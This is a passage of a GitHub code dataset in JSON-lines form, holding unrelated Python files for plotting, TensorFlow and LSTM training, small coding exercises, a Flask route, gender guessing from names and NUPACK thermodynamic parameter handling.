y1,color='cyan', label='Residue All Days')\nax.plot(x,y2, color='blue', label='Residue Weekdays')\nax.fill_between(x, y1, y2, where=y2 >= y1, facecolor='red', interpolate=True)\nax.fill_between(x, y1, y2, where=y2 <= y1, facecolor='green', interpolate=True)\nax.set_title('Residue between Allday vs Weekday Predictions')\nplt.xlabel('Clock')\nplt.ylabel('Time(s)')\nplt.xticks(k,time_labels,fontsize=7)\nplt.legend()\n\n\n","repo_name":"ArchitParnami/UAP","sub_path":"Pattern Analysis/PlotResidue.py","file_name":"PlotResidue.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"34215442244","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\ntotal = int(input())\r\nn = int(input())\r\nsums = 0\r\n\r\nfor _ in range(n):\r\n won, nums = map(int, input().split())\r\n sums += won*nums\r\n\r\nif sums == total:\r\n print(\"Yes\")\r\nelse: print(\"No\")","repo_name":"younghoonNa/Algorithm","sub_path":"Python/25304(영수증).py","file_name":"25304(영수증).py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31582179718","text":"#!/usr/bin/env python3\n#author: Tian Xia (SummerRainET2008@gmail.com)\n\nfrom pa_nlp.tf import *\nfrom pa_nlp.tf.estimator.param import ParamBase\n\nclass _ModelBuff:\n def __init__(self, model_path: str, capacity: int):\n '''bug: multiple files'''\n self._all_records = defaultdict(list)\n self._capacity = capacity\n self._model_path = model_path \n \n def update(self, batch_id: int, data_losses: list):\n '''\n :param data_losses: [(data_file, loss), ...]\n :return: \n '''\n all_records = self._all_records\n kept_batch_ids = set()\n removed_batch_ids = set()\n for data_file, loss in data_losses:\n records = all_records[data_file]\n records.append((loss, batch_id, data_file))\n if len(records) > self._capacity:\n records.sort()\n \n for p, (_, his_batch_id, _) in enumerate(records):\n if p < self._capacity:\n kept_batch_ids.add(his_batch_id)\n else:\n removed_batch_ids.add(his_batch_id)\n \n records.pop(self._capacity) \n \n for his_batch_id in removed_batch_ids - kept_batch_ids:\n self._remove_model(his_batch_id)\n\n def _remove_model(self, batch_id: int):\n file = os.path.join(self._model_path, f\"model-{batch_id}.*\")\n nlp.execute_cmd(f\"rm {file}\")\n\nclass TrainerBase(abc.ABC):\n def __init__(self, param: ParamBase, model_cls, predictor_cls, data_reader_cls):\n self._param = param\n self._model_cls = model_cls\n self._predictor_cls = predictor_cls\n self._data_reader_cls = data_reader_cls\n\n random.seed()\n nlp.ensure_folder_exists(param.path_work)\n\n self._model = model_cls(param, True)\n self._lr = tf.placeholder(dtype=tf.float32, shape=[])\n self._train_op = nlp_tf.construct_optimizer2(\n self._model.loss, learning_rate=self._lr\n )\n\n max_to_keep = 3 if nlp.is_none_or_empty(self._param.eval_files) else 1000\n self._saver = tf.train.Saver(tf.global_variables(), max_to_keep=max_to_keep)\n self._model_buff = _ModelBuff(self._param.path_model, 2)\n\n self._predictor = None\n if not nlp.is_none_or_empty(self._param.eval_files):\n pred_param = copy.deepcopy(self._param)\n pred_param.epoch_num = 1\n self._predictor = self._predictor_cls(\n pred_param, self._model_cls, self._data_reader_cls\n )\n\n nlp_tf.get_network_parameter_num()\n\n def _get_batch_id(self):\n return self._sess.run(tf.train.get_global_step())\n\n def _save_model(self):\n nlp_tf.model_save(\n self._saver, self._sess, self._param.path_model, \"model\", self._batch_id,\n )\n\n def _evaluate(self):\n self._save_model()\n\n self._predictor.load_model(self._param.path_model)\n data_losses = []\n for data_file in self._param.eval_files:\n key_measure = self._predictor.predict_dataset(data_file)\n data_losses.append((data_file, key_measure))\n \n self._model_buff.update(self._get_batch_id(), data_losses)\n for records in self._model_buff ._all_records.values():\n loss, batch_id, data_file = records[0]\n print(f\"[optimal]: '{data_file}', batch_id: {batch_id}, measure={loss}\")\n print()\n\n @abc.abstractmethod\n def _run_one_batch(self, epoch_id, batch_data):\n pass\n\n def train(self):\n self._sess = nlp_tf.get_new_session()\n self._sess.run(tf.global_variables_initializer())\n param = self._param\n\n reader = self._data_reader_cls(param.train_file, param, True)\n for epoch_id, batch_data in reader.get_batch_data():\n self._run_one_batch(epoch_id, batch_data)\n self._batch_id = self._get_batch_id()\n\n if param.evaluate_freq is not None and \\\n (self._batch_id + 1) % param.evaluate_freq == 0:\n self._evaluate()\n\n self._save_model()\n\n","repo_name":"YingtongBu/insight_nlp","sub_path":"pa_nlp/tf/estimator/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8555279382","text":"import csv, sys\nimport gender_guesser.detector as gender\nd = gender.Detector()\nfrom genderizer.genderizer import Genderizer as g\n\n# argument handling\nif len(sys.argv) is not 2:\n sys.exit('Please enter a school name! (Options: Penn, Brown, or Harvard)')\n\nschool = sys.argv[1].lower()\n\nif school != 'penn' and school != 'harvard' and school != 'brown':\n sys.exit('Not a valid school. Try Penn, Brown, or Harvard!')\n\nwith open('data/honorees_' + school + '_clean.csv', 'rb') as honorees, open('data/genders_' + school + '.csv', 'wb') as output:\n r = csv.reader(honorees)\n w = csv.writer(output)\n\n w.writerow(['Name', 'Year', 'Gender Guesser', 'Genderizer', 'Final'])\n\n for row in r:\n name = row[0]\n names = name.split(' ')\n gender = d.get_gender(names[0])\n gender2 = g.detect(firstName=names[0])\n w.writerow([name, row[1], gender, 'unknown' if gender2 is None else gender2, gender if gender == gender2 else 'unknown'])\n","repo_name":"dailypenn/data","sub_path":"honorary-degrees-gender-breakdown/gender.py","file_name":"gender.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"30294568085","text":"#!/usr/bin/env python\n\n\"\"\"\nAuthor: Cindy Tan\nLast Modified Date: 6 June 2017\n\nProcesses a Compucell3D simulation xml file and graphs one or more parameters.\nArguments:\n -f inputfile - full path to XML file\n -p parameters - comma separated parameters to graph\n -i image - method of graphing multiple parameters\n 0 (default) - plot all parameters on the same axis, one output\n 1 - plot each parameter on its own subplot of a figure, one output of the entire figure\n 2 - plot each paramater on its own figure, one output for each parameter\nOutput: graphs max, min, and average of a parameter and saves image(s) of graph in the script directory.\n\"\"\"\n\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom lxml import etree as et\nfrom optparse import OptionParser\n\nparser = OptionParser()\nparser.add_option('-f', '--file', type='string', dest='inputfile', help='path to XML file')\nparser.add_option('-p', '--parameters', type='string', dest='parameters', help='comma separated parameters to graph')\nparser.add_option('-i', '--image', type='int', dest='image', help='0 (default) - plot on same axis, one output; ' +\n '1 - plot separately, one output with all plots; 2 - plot separately, one output for each plot')\n\n(options, args) = parser.parse_args()\ninputfile = options.inputfile\nparameters = options.parameters.split(',')\nimage = 0\nif options.image:\n image = options.image\n\ntree = et.parse(inputfile)\nroot = tree.getroot()\n\ndata = np.empty([len(parameters), len(root), 3])\n\nparameter = 0\nwhile parameter < len(parameters):\n\n time = 0\n while time < len(root):\n parameter_values = np.empty(len(root[time]))\n\n cell = 0\n while cell < len(root[time]):\n parameter_values[cell] = root[time][cell].get(parameters[parameter])\n cell += 1\n\n data[parameter, time, 0], data[parameter, time, 1], data[parameter, time, 2] = \\\n np.amax(parameter_values), np.amin(parameter_values), np.average(parameter_values)\n\n time += 1\n parameter += 1\n\nif len(parameters) == 1:\n plt.plot(data[0])\n plt.legend(['max', 'min', 'average'], bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., fontsize=9)\n plt.ylabel(parameters[0])\n plt.xlabel('time')\n plt.show()\nelse:\n if image == 0:\n plt.subplot2grid((1, 4), (0, 0), colspan=3)\n\n parameter = 0\n while parameter < len(parameters):\n plt.plot(np.transpose(data[parameter])[0], label=parameters[parameter] + ' max')\n plt.plot(np.transpose(data[parameter])[1], label=parameters[parameter] + ' min')\n plt.plot(np.transpose(data[parameter])[2], label=parameters[parameter] + ' average')\n\n parameter += 1\n plt.xlabel('time')\n plt.ylabel(', '.join(parameters))\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., fontsize=9)\n plt.savefig('_'.join(parameters) + '.png')\n if image == 1:\n side = int(math.ceil(math.sqrt(len(parameters))))\n maxrows = int(math.ceil(float(len(parameters)) / side))\n\n plt.figure(1)\n\n parameter = 0\n while parameter < len(parameters):\n plt.subplot(maxrows, side, parameter + 1)\n\n plt.plot(data[parameter])\n plt.xlabel('time')\n plt.ylabel(parameters[parameter])\n\n parameter += 1\n plt.tight_layout()\n plt.savefig('_'.join(parameters) + '.png')\n if image == 2:\n parameter = 0\n while parameter < len(parameters):\n plt.subplot2grid((1, 4), (0, 0), colspan=3)\n\n plt.plot(np.transpose(data[parameter])[0], label=parameters[parameter] + ' max')\n plt.plot(np.transpose(data[parameter])[1], label=parameters[parameter] + ' min')\n plt.plot(np.transpose(data[parameter])[2], label=parameters[parameter] + ' average')\n\n plt.xlabel('time')\n plt.ylabel(parameters[parameter])\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., fontsize=9)\n\n plt.show()\n\n parameter += 1\n","repo_name":"miseminger/usra-2017","sub_path":"plot_compucell3d_data.py","file_name":"plot_compucell3d_data.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44801345442","text":"#==============================================\n# 样本库数据集数据分析\n# lichuan\n# lc@dlc618.com\n# 2021.7.6\n#==============================================\n\nimport glob,os\n\nimport csv\nimport numpy as np\n\n\ndef get_dir_file(dir_name, pattern = [\"*.png\",\"*.jpg\",\"*.jpeg\"]):\n '''\n 功能\n 读取路径下指定后缀的文件路径\n 输入\n dir_name :路径\n pattern :文件后缀要求\n 输出\n 所以符合条件的文件\n '''\n files = []\n for p in pattern:\n for dir,_,_ in os.walk(dir_name):\n files.extend(glob.glob(os.path.join(dir,p)))\n \n return files\n\n\ndef writer_csv(csv_file,data):\n '''\n 功能:\n 列表数据保存为 csv 文件\n 输入:\n csv_file : 保存路径\n data : 要保存的列表数据\n 输出:\n 成功\n '''\n\n with open(csv_file, 'w', newline='') as f: \n writer = csv.writer(f)\n writer.writerows(data)\n\n return True\n\n\ndef read_csv(csv_file):\n '''\n 功能:\n 读取 csv 文件为列表\n 输入:\n csv_file : csv 文件路径\n 输出:\n data : 列表数据\n '''\n data = list()\n\n with open(csv_file, 'r', newline=\"\") as f: \n reader = csv.reader(f)\n for row in reader:\n data.append(row)\n\n return data\n\n\ndef statistics(list):\n '''\n 功能:\n 统计列表中字符出现的次数\n 输入:\n list : 要统计的列表\n 输出:\n frequency : 字典格式\n '''\n frequency = {}\n\n for word in list:\n if word not in frequency:\n frequency[word] = 1\n else:\n frequency[word] += 1\n\n return frequency\n\n\ndef path_split(\n path='/media/lcq/样本库/铁路标注数据/保定/白天/<30/平交道口/人/JPEGImages/001903.jpg',\n # path='/media/lcq/样本库/铁路标注数据/客技站/白天/50/轨面/Annotations'\n ):\n\n '''\n 功能\n 根据图片的文件路径提取关键词\n 输入\n path :图片路径\n 输出\n 关键词列表\n '''\n\n path_split = path.split('/')\n img_name = path_split[-1]\n location = path_split[-7]\n sunshine = path_split[-6]\n distance = path_split[-5]\n scene = path_split[-4]\n target = path_split[-3]\n\n keys = [\n # path,\n img_name,\n location,\n sunshine,\n distance,\n scene,\n target]\n\n return keys\n\n\ndef test_get():\n \n # 测试路径\n # dir_name = 'dataset/'\n \n # 样本库测试路径\n # dir_name = '/media/lcq/样本库/铁路标注数据/保定'\n # dir_name = '/media/lcq/样本库/铁路标注数据/东郊'\n # dir_name = '/media/lcq/样本库/铁路标注数据/客技站'\n # dir_name = '/media/lcq/样本库/铁路标注数据/马鞍山'\n dir_name = '/media/lcq/样本库/铁路标注数据/亦庄'\n\n images_path = get_dir_file(dir_name)\n images_num = len(images_path)\n\n # ===================info ===================\n print('dir path : {}'.format(dir_name))\n print('file num : {}'.format(images_num))\n\n all_keys = []\n\n for i in range(images_num):\n\n keys = path_split(images_path[i])\n all_keys.append(keys)\n \n print('--{}/{}:{}'.format(i,images_num,keys))\n\n writer_csv('railSample_yz.csv', all_keys)\n\n\ndef test_read():\n\n csv_file = '/media/lcq/Data/modle_and_code/DataSet/RailSample/railSample.csv'\n\n headers = [\n 'img_name', # 文件名\n 'location', # 采集地点\n 'sunshine', # 采集时间\n 'camera', # 摄像机类型\n 'distance', # 距离\n 'scene', # 场景\n 'target'] # 目标\n\n print('================== Start ==================')\n\n all_keys = read_csv(csv_file)\n all_keys = np.array(all_keys)\n\n # img_names = all_keys[:,0]\n locations = all_keys[:,1]\n sunshines = all_keys[:,2]\n cameras = all_keys[:,3]\n distances = all_keys[:,4]\n scenes = all_keys[:,5]\n targets = all_keys[:,6]\n\n print('总图片数量 :{}'.format(len(all_keys)))\n print('采集地点 : {}'.format(statistics(locations)))\n print('采集时间 : {}'.format(statistics(sunshines)))\n print('摄像机类型 : {}'.format(statistics(cameras)))\n print('目标距离 : {}'.format(statistics(distances)))\n print('图像场景 : {}'.format(statistics(scenes)))\n print('目标类型 : {}'.format(statistics(targets)))\n\n print('=================== End ===================')\n\n\nif __name__ == '__main__':\n test_read()","repo_name":"lichuanqi/Dataset_Tools","sub_path":"analysis/railSampleAnalysis.py","file_name":"railSampleAnalysis.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"15081539395","text":"from flask import render_template, request\nimport requests\n\nfrom config import Config\nfrom forms import TagSelectForm\nfrom run import app\n\n\n@app.route('/', methods=['GET', 'POST'])\n@app.route('/index', methods=['GET', 'POST'])\ndef index():\n app.logger.info('Web: index called.')\n tag_select_form = TagSelectForm()\n if request.method == 'GET':\n return render_template('index.html', form=tag_select_form)\n elif request.method == 'POST':\n if tag_select_form.validate_on_submit():\n hair_color = tag_select_form.hair_color.data\n app.logger.info(hair_color)\n headers = {'Content-Type': 'application/json'}\n data = {'label': hair_color[:-5]}\n response = requests.get(Config.API_URI, headers=headers, json=data)\n img_bytes = response.json().get('img_bytes')\n imgs = [f\"data:image/png;base64,{img_byte}\" for img_byte in img_bytes]\n return render_template('result.html', imgs1=imgs[:5], imgs2=imgs[5:])\n else:\n return render_template('index.html', form=tag_select_form)","repo_name":"opeco17/kubernetes_raspberrypi_app","sub_path":"web/src/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26969001787","text":"# Definition for a undirected graph node\nclass UndirectedGraphNode(object):\n def __init__(self, x):\n self.label = x\n self.neighbors = []\n\nclass Solution(object):\n def cloneGraph(self, node):\n \"\"\"\n :type node: UndirectedGraphNode\n :rtype: UndirectedGraphNode\n \"\"\"\n if node == None:\n return None\n graphNodes = {}\n cloneNode = self.getGraphNode(node,graphNodes)\n return cloneNode\n def getGraphNode(self,node,graphNodes):\n cloneNode = UndirectedGraphNode(node.label)\n graphNodes[cloneNode.label] = cloneNode\n for neighborNode in node.neighbors:\n if neighborNode.label in graphNodes:\n cloneNeighrNode = graphNodes(neighborNode.label)\n else:\n cloneNeighrNode = self.getGraphNode(neighborNode,graphNodes)\n cloneNode.neighbors.append(cloneNeighrNode)\n return cloneNode\n\n","repo_name":"FengFengHan/LeetCode","sub_path":"Clone Graph_wrong.py","file_name":"Clone Graph_wrong.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30070563717","text":"\"\"\"\r\n\n\nCreate a function that takes two numbers `num1`, `num2`, and a list `lst` and\nreturns a list containing all the numbers in `lst` greater than `num1` and\nless than `num2`.\n\n### Examples\n\n list_between(3, 8, [1, 5, 95, 0, 4, 7]) ➞ [5, 4, 7]\n \n list_between(1, 10, [1, 10, 25, 8, 11, 6]) ➞ [8, 6]\n \n list_between(7, 32, [1, 2, 3, 78]) ➞ []\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef list_between(num1, num2, lst):\n new_list = []\n for value in lst:\n if value > num1 and value < num2:\n new_list.append(value)\n continue\n return new_list\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"HJNhLoS4W8jdEYprh_10.py","file_name":"HJNhLoS4W8jdEYprh_10.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24518118574","text":"#Replace all ______ with rjust, ljust or center. \n'''\nthickness = int(raw_input()) #This must be an odd number\nc = 'H'\n\n#Top Cone\nfor i in range(thickness):\n print (c*i).rjust(thickness-1)+c+(c*i).ljust(thickness-1)\n\n#Top Pillars\nfor i in range(thickness+1):\n print (c*thickness).rjust(thickness*2)+(c*thickness).ljust(thickness*6)\n\n#Middle Belt\nfor i in range((thickness+1)/2):\n print (c*thickness*5).center(thickness*6) \n\n#Bottom Pillars\nfor i in range(thickness+1):\n print (c*thickness).rjust(thickness*2)+(c*thickness).ljust(thickness*6) \n\n#Bottom Cone\nfor i in range(thickness):\n print ((c*(thickness-i-1)).rjust(thickness)+c+(c*(thickness-i-1)).ljust(thickness)).center(thickness*6) ''' \n \nfrom __future__ import print_function, division\n\nchar = 'H'\nspace = ' '\n\ndef aligntext(width):\n lines = []\n for n in range(width):\n lines.append((char*(n*2+1)).center(width*2-1, space))\n\n offset = space*(width*4 - (width*2-1))\n\n for n in range(width+1):\n lines.append((char*width).center(width*2-1, space) + offset + (char*width).center(width*2-1, space))\n\n for n in range((width+1)//2):\n lines.append((char*width*5).center(width*6, space))\n\n for n in range(width+1):\n lines.append((char*width).center(width*2-1, space) + offset + (char*width).center(width*2-1, space))\n\n for n in reversed(range(width)):\n lines.append(space*(width*4) + (char*(n*2+1)).center(width*2-1, space))\n\n return lines\n\ndef main():\n W = int(input())\n print('\\n'.join(aligntext(W)))\n\nif __name__ == '__main__':\n main()\n","repo_name":"mraduldubey/HackerRank-Python-Challenge","sub_path":"Strings/l21.py","file_name":"l21.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"29984056185","text":"#!/usr/bin/env python3\n\nfrom keras.preprocessing import sequence\nimport keras\nimport tensorflow as tf\nimport os\nimport numpy as np\nimport pandas as pd\n\n\ndef build_model(vocab_size, embedding_dim, rnn_units, batch_size):\n model = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size, embedding_dim,\n batch_input_shape=[batch_size, None]),\n tf.keras.layers.LSTM(rnn_units,\n return_sequences=True,\n stateful=True,\n recurrent_initializer='glorot_uniform'),\n tf.keras.layers.Dense(vocab_size)\n ])\n return model\n\n\ndef chunks(arr, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(arr), n):\n if (len(arr[i:i + n]) >= n):\n yield arr[i:i + n]\n\n\n\ndef split_input_target(chunk): # for the example: hello\n input_text = chunk[:-1] # hell\n target_text = chunk[1:] # ello\n return input_text, target_text # hell, ello\n\n\n\n\n\ndef main():\n path_to_file = \"./poem_dataset.csv\"\n print('load dataset')\n raw_data = pd.read_csv(path_to_file, encoding=\"utf-8\")\n data = raw_data.copy()\n\n # parse content\n print('Parse content')\n text = ''\n for i, row in data.iterrows():\n text += row['Content']\n\n vocab = sorted(set(text))\n\n corpus = []\n char2idx = {u: i for i, u in enumerate(vocab)}\n idx2char = np.array(vocab)\n\n def int_to_text(ints):\n try:\n ints = ints.numpy()\n except:\n pass\n return ''.join(idx2char[ints])\n\n def text_to_int(text):\n return np.array([char2idx[c] for c in text])\n\n for _, row in data.iterrows():\n corpus.append(text_to_int(row['Content']))\n\n seq_length = 100\n\n text_as_int = []\n for row in corpus:\n chks = list((chunks(row, seq_length + 1)))\n text_as_int.append(chks)\n\n flatten_text_as_int_n1 = np.array(text_as_int).flatten()\n flatten_text_as_int_n2 = [np.array(flattened).flatten() for flattened in flatten_text_as_int_n1]\n flatten_text_as_int = np.array(flatten_text_as_int_n2).flatten().flatten()\n flat_list = [item for sublist in flatten_text_as_int_n2 for item in sublist]\n\n char_dataset = tf.data.Dataset.from_tensor_slices(flat_list)\n sequences = char_dataset.batch(seq_length + 1, drop_remainder=True)\n\n dataset = sequences.map(split_input_target) # we use map to apply the function to every entry\n\n # Time to model\n BATCH_SIZE = 64\n VOCAB_SIZE = len(vocab) # vocab is number of unique characters\n EMBEDDING_DIM = 256\n RNN_UNITS = 1024\n\n # Buffer size to shuffle the dataset\n # (TF data is designed to work with possibly infinite sequences,\n # so it doesn't attempt to shuffle the entire sequence in memory. Instead,\n # it maintains a buffer in which it shuffles elements).\n BUFFER_SIZE = 10000\n\n data = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE, drop_remainder=True)\n\n model = build_model(VOCAB_SIZE, EMBEDDING_DIM, RNN_UNITS, BATCH_SIZE)\n\n def loss(labels, logits):\n return tf.keras.losses.sparse_categorical_crossentropy(labels, logits, from_logits=True)\n\n model.compile(optimizer='adam', loss=loss)\n checkpoint_dir = './training_checkpoints'\n # Name of the checkpoint files\n checkpoint_prefix = os.path.join(checkpoint_dir, \"ckpt_{epoch}\")\n\n checkpoint_callback=tf.keras.callbacks.ModelCheckpoint(\n filepath=checkpoint_prefix,\n save_weights_only=True)\n\n history = model.fit(data, epochs=1, callbacks=[checkpoint_callback])\n\n model = build_model(VOCAB_SIZE, EMBEDDING_DIM, RNN_UNITS, batch_size=1)\n\n model.load_weights(tf.train.latest_checkpoint(checkpoint_dir))\n model.build(tf.TensorShape([1, None]))\n\n def generate_text(model, start_string):\n # Evaluation step (generating text using the learned model)\n\n # Number of characters to generate\n num_generate = 800\n\n # Converting our start string to numbers (vectorizing)\n input_eval = [char2idx[s] for s in start_string]\n input_eval = tf.expand_dims(input_eval, 0)\n\n # Empty string to store our results\n text_generated = []\n\n # Low temperatures results in more predictable text.\n # Higher temperatures results in more surprising text.\n # Experiment to find the best setting.\n temperature = 1.05\n\n # Here batch size == 1\n model.reset_states()\n for i in range(num_generate):\n predictions = model(input_eval)\n # remove the batch dimension\n\n predictions = tf.squeeze(predictions, 0)\n\n # using a categorical distribution to predict the character returned by the model\n predictions = predictions / temperature\n predicted_id = tf.random.categorical(predictions, num_samples=1)[-1, 0].numpy()\n\n # We pass the predicted character as the next input to the model\n # along with the previous hidden state\n input_eval = tf.expand_dims([predicted_id], 0)\n\n text_generated.append(idx2char[predicted_id])\n\n return start_string + ''.join(text_generated)\n\n inp = input(\"Type a starting string: \")\n print(generate_text(model, inp))\n\nif __name__ == \"__main__\":\n main()","repo_name":"vgrangep/poem_generator","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":5262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37270262634","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nfrom typing import List, Tuple\nfrom datetime import datetime\nimport os\nimport itertools\n\nfrom . import fileio, util, plotting\n\nparam_name_dict = {'dH':'dH', 'dG':'dG_37'}\n\n\"\"\" Helper Functions \"\"\"\ndef add_2_dict_val(mydict, value):\n for key in mydict:\n mydict[key] += value\n return mydict\n \ndef get_dict_mean_val(mydict):\n return np.nanmean(list(mydict.values()))\n\ndef center_new_param(old_dict, new_dict, verbose=False):\n \"\"\"\n Can only center one layer deep. If nested dictionary, need to call\n this function separately for each category you want to center\n Returns:\n new_dict - centered `new_dict`\n \"\"\"\n try:\n target_mean = np.mean([old_dict[k] for k in new_dict if k in old_dict])\n fitted_mean = get_dict_mean_val(new_dict)\n \n new_dict = add_2_dict_val(new_dict, -1 * fitted_mean)\n new_dict = add_2_dict_val(new_dict, target_mean)\n\n if verbose:\n print('\\tMean value of old_dict is %.3f' % target_mean)\n print('\\tMean value of fitted new_dict is %.3f' % fitted_mean)\n print('\\tMean value of centered new_dict is %.3f\\n' % get_dict_mean_val(new_dict))\n except:\n pass\n return new_dict\n \n\"\"\" Formatting Functions \"\"\"\n\ndef update_template_dict(template_dict, coef_dict):\n \"\"\" \n Overwrite tempate_dict with values in coef_dict\n Up to 2 levels deep as in the parameter file\n \"\"\"\n ignored_keys = ['name', 'type', 'material', 'references', 'time_generated']\n new_dict = template_dict.copy()\n for param in template_dict:\n if not param in ignored_keys:\n if isinstance(template_dict[param], List) and param in coef_dict:\n new_dict[param] = coef_dict[param]\n elif isinstance(template_dict[param], dict):\n for key in template_dict[param]:\n if key in coef_dict[param] and not (key in ignored_keys): \n if isinstance(coef_dict[param][key], dict):\n for p,v in coef_dict[param][key].items():\n new_dict[param][key][p] = v\n else:\n new_dict[param][key] = coef_dict[param][key]\n \n return new_dict\n\n \n\ndef coef_df_2_dict(coef_df, template_dict=None,\n center_new_parameters=False):\n \"\"\"\n Convert lr.coef_df to a NUPACK style dictionary\n without modifying the contents\n \"\"\"\n coef_dict = defaultdict(dict)\n for _,row in coef_df.iterrows():\n pclass, pname = row.name.split('#')\n coef_dict[pclass][pname] = row.values[0]\n \n # Convet numerical keys & values to lists\n for key, sub_dict in coef_dict.items():\n if isinstance(sub_dict, dict):\n inds = list(sub_dict.keys())\n if inds[0].isdigit():\n inds = [int(x) for x in inds]\n if template_dict is None:\n new_values = np.zeros(np.max(inds))\n else:\n new_values = template_dict[key].copy()\n \n for ind, value in sub_dict.items():\n new_values[int(ind)-1] = value\n coef_dict[key] = list(new_values)\n \n # Overwrite tempate_dict\n if not template_dict is None:\n if center_new_parameters:\n print('Centering new parameters...')\n for p_group in coef_dict:\n if p_group in template_dict:\n print('group', p_group)\n coef_dict[p_group] = center_new_param(old_dict=template_dict[p_group], \n new_dict=coef_dict[p_group], verbose=True)\n \n new_dict = update_template_dict(template_dict, coef_dict)\n else:\n new_dict = coef_dict\n \n return new_dict\n \n \ndef coef_dict_2_df(coef_dict):\n \"\"\"\n NUPACK style dict to lr.coef_df style\n Args:\n coef_dict - param_set_dict['dH'] level\n \"\"\"\n flat_coef_dict = defaultdict()\n for pclass in coef_dict:\n if not pclass in ['name', 'type', 'material', 'references', 'time_generated']:\n if isinstance(coef_dict[pclass], list):\n for i,value in enumerate(coef_dict[pclass]):\n coef_name = '%s#%d' % (pclass, i+1)\n flat_coef_dict[coef_name] = value\n elif isinstance(coef_dict[pclass], float):\n flat_coef_dict[pclass] = coef_dict[pclass]\n else:\n for pname in coef_dict[pclass]:\n try:\n coef_name = pclass + '#' + pname\n flat_coef_dict[coef_name] = coef_dict[pclass][pname]\n except:\n print(coef_name)\n else:\n pass\n \n return pd.DataFrame(index=['value'], data=flat_coef_dict).T\n \n \ndef get_fixed_params(param_set_template_file:str, fixed_pclass:List[str],\n features_not_fixed:List[str]=None, return_full_coef_df=False) -> Tuple[pd.DataFrame, List[str]]:\n \"\"\"\n Gets the params in `param_set_template_file` that starts with a str in `fixed_pclass`.\n Returns:\n fixed_coef_df - dataframe, contains the values for the fixed parameters\n return_full_coef_df - if True, return all coef. Useful for regularized fitting with prior\n \"\"\"\n param_set_dict = fileio.read_json(param_set_template_file)\n \n ori_coef_df = pd.concat((coef_dict_2_df(param_set_dict['dH']), coef_dict_2_df(param_set_dict['dG'])), axis=1)\n ori_coef_df.columns = ['dH', 'dG']\n\n if return_full_coef_df:\n fixed_coef_df = ori_coef_df.copy()\n else:\n fixed_coef_df = ori_coef_df.loc[[x for x in ori_coef_df.index if x.split('#')[0] in fixed_pclass]]\n if features_not_fixed is not None:\n fixed_coef_df.drop(labels=features_not_fixed, inplace=True)\n \n fixed_coef_df.fillna(0, inplace=True)\n fixed_feature_names = fixed_coef_df.index.tolist()\n \n return fixed_coef_df, fixed_feature_names\n \n\"\"\" Convert parameters between different models \"\"\"\n\ndef get_hairpin_seq_df(lr:util.LinearRegressionSVD, param:str, loop_len:int=3) -> pd.DataFrame:\n \"\"\"\n Converts `feature_list.get_feature_list()` style hairpin parameters \n to nupack hairpin_triloop or hairpin_tetraloop style parameters\n \"\"\"\n loop_mid_param = lr.coef_df.loc[[x for x in lr.coef_df.index if x.endswith('_'+'.'*loop_len)]]\n hairpinmm_param = lr.coef_df.loc[[x for x in lr.coef_df.index if (x.endswith('_(.+.)') and (not x.startswith('x')))]]\n\n full_loop_list = []\n param_list = []\n for loop_mid in loop_mid_param.index:\n loop_mid_seq = loop_mid.split('_')[0]\n for hairpinmm in hairpinmm_param.index:\n # hairpinmm - 'NN+NN_(.+.)'\n nt1, nt2 = hairpinmm[1], hairpinmm[3]\n hairpinmm_seq = hairpinmm.split('_')[0]\n if nt1 == loop_mid_seq[0] and nt2 == loop_mid_seq[-1]:\n full_triloop = hairpinmm_seq[0] + loop_mid_seq + hairpinmm_seq[-1]\n full_loop_list.append(full_triloop)\n param_list.append(loop_mid_param.loc[loop_mid][0] + hairpinmm_param.loc[hairpinmm][0])\n\n loop_df = pd.DataFrame(index = full_loop_list, data=param_list, columns=[param])\n return loop_df\n \n \ndef get_hairpin_mismatch(lr:util.LinearRegressionSVD):\n \"\"\"\n Formats `feature_list.get_feature_list()` style hairpin_mismatch `NN+NN_(.+.)`\n to NUPACK style\n Args:\n \n Returns:\n Dict, equivalent to `hairpin_dict['dH']['hairpin_mismatch']`\n \"\"\"\n def convert_mm_name(x):\n seq = x.split('_')[0]\n return seq[-2:] + seq[:2]\n \n hairpinmm_param = lr.coef_df.loc[[x for x in lr.coef_df.index if (x.endswith('_(.+.)') and (not x.startswith('x')))]]\n hairpinmm_param.index = 